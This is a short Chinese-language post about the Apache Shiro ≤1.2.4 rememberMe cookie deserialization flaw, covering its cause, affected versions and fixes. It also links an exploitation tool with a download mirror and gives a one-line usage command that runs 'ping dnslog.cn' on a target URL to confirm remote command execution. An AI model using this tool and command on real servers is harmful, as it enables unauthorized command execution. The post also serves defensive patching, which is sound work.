apache shiro 1.2.4反序列化漏洞
Apache Shiro 简介
Apache Shiro 是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
漏洞成因
Apache Shiro 反序列化漏洞的主要成因是 shiro 在进行 remember me 操作时,将用户信息序列化后加密存储在cookie中,当shiro 获取这个cookie进行反序列化操作获取原始用户信息时,没有严格限制反序列化内容,导致了命令执行。
影响版本
Apache Shiro <= 1.2.4
漏洞利用
工具地址:
https://github.com/sv3nbeast/ShiroScan
用法:
usage:python3 shiro.py http://url.com "ping dnslog.cn"
验证推荐使用这个dnslog平台,速度比ceye.io要快很多,在线免登陆生成临时二级子域名,可查询到dns解析记录
http://www.dnslog.cn/
为防止原作者的github链接失效,特地保存一份百度云
链接:https://pan.baidu.com/s/1Giy_1RlE1tmlAuO3yvrGWA
提取码:d37s
解决建议:
1. 升级apache shrio至1.2.4以上版本(不包括1.2.4)。
2. 禁止使用默认key或者网上公开的key,需使用动态认证key。